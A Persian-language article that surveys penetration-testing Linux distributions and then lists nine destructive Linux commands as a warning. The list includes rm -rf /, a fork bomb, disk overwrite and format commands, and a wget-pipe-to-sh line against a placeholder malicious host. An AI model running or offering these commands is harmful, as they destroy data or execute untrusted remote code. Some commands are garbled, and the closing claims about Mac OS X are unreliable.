Samurai Web Testing Framework یک محیط لینوکس بدون نیاز به نصب (live) است که به گونهای پیکربندی شده تا به عنوان یک محیط آزمایش وب عمل کند. این CD شامل بهترین ابزار منبع باز و رایگان است که روی آزمایش و حمله به وبسایتها متمرکز شده است. انجام آزمایشات امنیتی وب از طریق ابزار موجود به صورت مراحل چهارگانه انجام میشود.
Network Security Toolkit یک CD قابل بوت بر پایه Fedora Core است. این ابزار به شکلی طراحی شده است تا امکان دسترسی به بهترین اپلیکیشنهای امنیت شبکه منبع باز را فراهم کند. این اپلیکیشن را باید در پلتفرمهای x86 اجرا کرد. هدف اصلی از توسعه این ابزار تامین کردن امنیت شبکه به وسیله مجموعه جامعی از ابزار امنیتی برای مدیران شبکه بوده است.
ضربالمثلی هست که میگوید نیاز مادر اختراع است، و سیستمعامل لینوکس NodeZero هم از این قاعده مستثنی نیست. گروه سازنده NodeZero که از مجموعه توسعه دهندگان و آزمایش کنندگان تشکیل میشوند با همکاری یک دیگر مفهومی به نام سیستم Live را در توزیعهای آزمایشی لینوکس به نام خود ثبت کردهاند و آنها قصد ندارند با کار خود هیچ تاثیر دایمی روی یک سیستم بگذارند. بنابراین تمام تغییرات اعمال شده بعد از ریبوت از بین خواهد رفت. این سیستم بیشتر مناسب آزمایشات گاه به گاه است.
Pentoo نیز به صورت یک CD و USB زنده و برای سنجش سطح نفوذ و ارزیابی امنیتی طراحی شده است. این سیستمعامل مبتنی بر Gentoo Linux به هر دو شکل ۳۲ و ۶۴ بیتی نیز قابل نصب است. همچنین Pentoo را میتوان به صورت الحاقی روی Gentoo نصب کرد. نرمافزار کرک GPGPU و انواع مختلفی از ابزارهای تست نفوذ و ارزیابی امنیتی از جمله قابلیتهای این سیستمعامل است.
این سیستمعامل یک پروژه رایگان و منبعباز برای تلفیق ابزارهای آزمایش میزان نفوذ ذیری و لینوکس گنوم دسکتاپ است. GnackTrack یک توزیع لینوکس Live یا قابل نصب و مبتنی بر اوبونتو است که برای آزمایش نفوذ در نظر گرفته شده است. این توزیع با چندین ابزار مختلف از جمله Metasploit, Armitage و W3AF عرضه شده است که برای آزمایشای سطح نفوذپذیری بسیار مفید هستند.
Blackbuntu یک توزیع لینوکس است که به طور مشخص برای آزمایش نفوذپذیری و برای تمرین دانشجویان جهت یادگیری مهارتهای امنیتی در نظر گرفته شده است. Blackbuntu یک توزیع آزمایش میزان نفوذپذیری در محیط دسکتاپ گنوم است که نسخه آخر آن از ابونتو ۱۰٫۱۰ استفاده میکند.
Knoppix STD یک توزیع لینوکس زنده مبتنی بر Knoppix است که روی ابزارهای امنیت کامپیوتر متمرکز شده است. این مجموعه شامل ابزارهایی با مجوز GPL در زمینههای احرازهویت، کرک کردن رمزعبور، رمزگذاری، پزشکی قانونی، فایروالها، هانی پاتها، سیستم تشخیص نفوذ، نرمافزار شبکه، نفوذ، شنود، اسمبلر، ارزیابی آسیبپذیری و شبکههای بیسیم است. نسخه ۰٫۱ از Knoppix STD در ۲۴ ژانویه ۲۰۰۴ تحت Knoppix 3.2 منتشر شد. به همین دلیل این پروژه با رکود و فقدان درایورها و نسخههای بهروزرسانی مواجه بود. هنوز مشخص نیست که نسخه ۰٫۲ آن چه زمانی منتشر میشود. شما میتوانید از طریق وبسایت رسمی آن به ابزارهای موجود دسترسی داشته باشید.
Weakerth4n یک توزیع سنجش میزان نفوذپذیری است که از Debian Squeeze ساخته شده است. این توزیع لینوکس برای محیط دسکتاپ از Fluxbox استفاده میکند. از آنجا که این سیستمعامل شامل انواع مختلفی از ابزارهای بیسیم است برای هک کردن WiFi بسیار ایدهال خواهد بود. یک وبسایت خوش ساخت و یک انجمن آنلاین متعهد برای پشتیبانی از آن در نظر گرفته شده است. ابزارهای هک کردن وایفای در نظر گرفته شده برای این توزیع شامل Wifi attacks, SQL Hacking, Cisco Exploitation, Password Cracking, Web Hacking, Bluetooth, VoIP Hacking, Social Engineering, Information Gathering, Fuzzing Android Hacking, Networking و ساخت شلها است.
خیلی از هکرها معتقدند این پیشرفتهترین، قدرتمندترین و در عین حال زیباترین توزیع آزمایش نفوذپذیری است که تا به حال ساخته شده است. Cyborg Hawk به یک مجموعه حرفهای از ابزار مورد نیاز برای هکرهای اخلاقی کلاه سفید و متخصصان امنیت سایبری مجهز شده است. بیش از ۷۰۰ ابزار برای این سیستمعامل در نظر گرفته است که شامل ابزارهای مخصوص امنیت موبایل و تحلیلگر بدافزار نیز میشود. این توزیع لینوکس یک نسخه جدید مبتنی بر لینوکس اوبونتو است.
با این بررسی مشخص میشود که هکرهای کلاه سیاه اغلب از لینوکس برای مقاصد خود استفاده میکنند، اما از آنجا که شکار آنها همیشه در محیط سیستمعامل ویندوز اجرا میشوند، باید از ویندوز نیز استفاده کنند. هر چند با انتقال اکثر شرکتهای مالی به سرورهای لینوکسی این رویه در حال تغییر است. همچنین Mac OS X نیز هدف محبوبی برای بدافزارها و حملات هکرها نیست، چرا که نه در دسته معروفترین سرور (لینوکس) قرار دارد و نه در شاخه معروفترین کلاینت (ویندوز) جای میگیرد.

اکثر فرمانهای لینوکس مفید و کاربردی هستند، اما این دستورات موضوع مقاله ما نیستند. ما در این مقاله در مجموع نه مورد از دستورات لینوکس که باعث از کارافتادگی هر کامپیوتری میشوند را برای شما فهرست کردهایم. دستوراتی که اجرای آنها مشکلات متعددی را برای شما به همراه خواهند آورد.
۱٫ rm –rf
فرمان rm –rf / هر چیزی را حذف میکند، به طوری که نه فقط فایلهای روی هارددیسک، بلکه فایلهایی که روی یک رسانه قابل حمل متصل به کامپیوتر وجود داشته باشد را نیز حذف میکند.
۲٫ () {: |: &} ;:
() {: |: &} ;: به نام بمب فورک (Fork Bomb) نیز شناخته میشوند. بمب فورک نه تنها زمان پردازنده مرکزی را مورد استفاده قرار میدهد بلکه جدول فرآیندهای سیستمعامل را به طور کامل سرریز میکند، بهطوری که در نهایت باعث به وجود آمدن یک حمله انکار سرویس روی یک سیستم لینوکسی شده و اینکار را تا وقتی که سیستم به طور کامل فریز شده و از دسترس خارج شود، ادامه میدهد.
۳٫ command > dev / sda
این فرمان دادههای خامی را تولید کرده و تمامی فایلهای درون یک بلوک را با دادههای خام رونویسی میکند. در نتیجه حجم قابل توجهی از دادهها در یک بلوک از دست میروند.
۴٫ mv directory / dev /null
این فرمان همه اطلاعات شخصی شما را به درون یک حفره سیاه ارسال میکند، به این معنی که دادهها شما برای همیشه از دست خواهند رفت.
۵٫ wget http: // malicious_source –O | sh
خط بالا اسکریپتی را از وب دانلود کرده و آنرا برای sh ارسال میکند. اینکار باعث اجرای محتوای درون اسکریپت میشود. اجرای اسکرپیتهایی که از اینترنت دانلود میشوند، همیشه خطرناک است. به دلیل اینکه در اکثر موارد اسکرپیتها غیر قابل اعتماد هستند. در نتیجه سعی کنید تا حد امکان از این دستور برای همیشه دوری کنید.
۶٫ mkfs.ex3 / dev / sda
این دستور را میتوانید معادل فرمت کردن پارتیشن C در سیستمعامل ویندوز در نظر بگیرید. بهطوری که دیگر هرگز به دادههای خود دست پیدا نخواهید کرد. به این شکل سیستم شما تبدیل به یک دستگاه غیر قابل مصرف میشود.
۷٫ > File
این فرمان برای پاک کردن محتوای فایلها مورد استفاده قرار میگیرد. اگر دستور بالا همراه با ترکیبی شبیه به > xt.conf اجرا شود، فایل پیکربندی یا هرگونه فایل پیکربندی سیستمی را رونویسی خواهد کرد.
۸٫ ^foo^bar
این فرمان به خطرناکی دستوراتی نیست که به آنها اشاره کردیم. این فرمان به منظور ویرایش فرمانی که قبلا اجرا شده است بدون آنکه نیازی به تایپ مجدد فرمان ضرورتی داشته باشد مورد استفاده قرار میگیرد. در یک وضعیت اشتباه، این دستور به شکل مفرطی باعث وارد شدن آسیبهای جبرانناپذیری میشود. به ویژه اگر دستوری که قبلا اجرا شده است را چک نکرده باشید، ^foo^bar میتواند خطرناک باشد.
۹٫ Decompression Bomb
زمانی که از شما درخواست میشود تا یک فایل فشردهشده را باز کنید، محتوای فایل ممکن است به شدت فشرده شده باشد. زمانی که یک فایل را از حالت فشرده خارج میکنید، صدها گیگابایت داده استخراج میشوند که میتوانند هارددیسک شما را پر کرده و به این شکل کارایی سیستم شما را پایین آورند. در نتیجه سعی کنید از اینکار اجتناب کنید.
اکنون که با این دستورات آشنا شدید، به خوبی میتوانید از اجرای این دستورات ممانعت به عمل آورید.